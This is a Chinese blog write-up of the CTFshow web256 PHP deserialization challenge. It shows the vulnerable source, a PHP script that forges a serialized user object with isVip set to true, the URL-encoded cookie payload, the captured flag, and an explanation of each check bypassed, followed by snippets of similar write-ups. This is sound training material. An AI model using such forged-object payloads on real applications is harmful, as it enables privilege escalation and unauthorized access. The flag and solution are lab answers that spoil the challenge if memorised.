CTFSHOW web入门 反序列化 web256

原创 于 2026-04-07 21:23:38 发布 · 57 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#php反序列化 #php代码审计

web256

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){  //将username和password进行比较,不相等进入里面
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}






<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$o=new ctfShowUser();
$o->username='admin';
$o->password='password';
$o->isVip=true;
echo urlencode(serialize($o));

?>

GET

username=admin&password=password

Cookies

user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22password%22%3Bs%3A8%3A%22password%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

ctfshow{0a328664-3455-4a8f-865b-473c4fb136a8}

GET 请求传参进入到第一个 if 条件,符合要求,绕过 if

if(isset($username) && isset($password)){
在这里通过 COOKIE 传参,我们传入的内容进行反序列化,题目中 username 和 password 的值被更改成了 admin 和 password
$user = unserialize($_COOKIE['user']);
这进入到第二个 if 条件,他调用 login 方法,比较 username、passwor 和 u、p 进行对比,看是否相等,这里也是直接绕过了
if($user->login($username,$password)){
这里是第三个 if 条件,我们在给 user 传参的时候就修改了 isVip 的值为 true,所以这里也是直接绕过了
if($user->checkVip()){
他了这里是调用vipOneKeyGetFlag()方法,首先判断 isVip 可是 true,然后再把$flag 变成全局变量,后面是对比 username 和 password 的值可一样,这里也是直接绕过了
$user->vipOneKeyGetFlag();

本题考点:php 代码审计,php 反序列化

CTFshow 反序列化 web256
Kradress的博客
12-19 559
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
CTFSHOW WEB入门反序列化
Npceer-一位网安初学者的博客
03-01 1343
最近特别懒 等开学在高强度更新其他几篇 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
ctfshow-web256(反序列化)
m0_62094846的博客
02-23 741
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
CTFSHOW-WEB入门-反序列化(笔记)
A10ng_的博客
04-14 2988
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
ctfshow反序列化web256
m0_62584974的博客
04-22 465
反序列化 Web256 题目有判断password和username相不相等 判断了才进行反序列化 <? //ctfshow 反序列化web256 class ctfShowUser{ public $username='1'; public $password='2'; public $isVip=ture; public function checkVip(){ return $this->isVip; }
ctfshow web入门--反序列化
2402_87078084的博客
03-10 419
这道题还是更偏向于代码审计,而且一开始就给出了username和password。
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6364
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
ctfshow web入门 web254——— 反序列化wp
2202_75289892的博客
08-20 2237
代码审计:定义了ctfShoeUser类get传参username和password,isset()是检查变量是否被定义的函数,若变量被定义且值不是null,那么返回值是true,接着实例化对象user.....最终输出flag所以我们传入的参数只要是已经被定义的值就行?
CTFshow 反序列化wp
会下雪的晴天
01-02 1916
title: CTFshow 反序列化wp date: 2020-12-02 20:03:53 categories: ctfshow link:https://yq1ng.github.io/ 说一些有的没的: payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload.
ctfshow——web入门254~258
最新发布
uwvwko的博客
05-17 1343
结果:O:11:"ctfShowUser":3:{s:8:"username";结果:O:11:"ctfShowUser":3:{s:8:"username";然后我们怎么调用他呢,看到ctfShowUser类中的 __destruct,但是如果照他的源代码,class=new info()简单分析就是传入的username和password的值回去当作login方法的参数,然后只要让他们和类中的值一样就好了。
反序列化ctfshow web255-web259)
m0_72929232的博客
01-31 793
记得get传入的username与password与这里相对应。多了一步判断要求username和password的值不相等。对形如O:7:进行了过滤,我们可以在数字前加上加号绕过。cookie传入下列序列化输出的结果。改cookie推荐一个插件很方便。然后传参getshell。
ctfshow反序列化 web254 - web262
2301_78931332的博客
03-18 827
ctfshow反序列化 web254 - web262
ctfshow-web入门-反序列化
2301_80470992的博客
03-23 1968
先看题这道题目没什么特殊,甚至用不到反序列化,直接GET传参username和password的值与源码中一样即可完成。
CTFSHOWweb入门反序列化
7ruth0hn的博客
07-25 3911
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
ctfshow web入门 反序列化
Sentiment的博客
12-26 2243
web254
CTFShow反序列化web254-8题wp
observer的博客
04-28 1102
PHP反序列化ctfshow254-8
ctfshow-web入门-反序列化web254-web258)
Welcome To My6n Blog
10-18 2242
通过反射调用私有变量。这里 code 和 class 都成了公有变量,我们可以直接访问到,只是增加了正则过滤,匹配的是大小写 o 或者 c:数字: 这种形式的内容,我们在数字前添加 + 绕过。
CTFshow-WEB入门-反序列化
feng的博客
02-14 6304
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshowweb入门php反序列化
m0_74013288的博客
11-12 3319
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化,对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值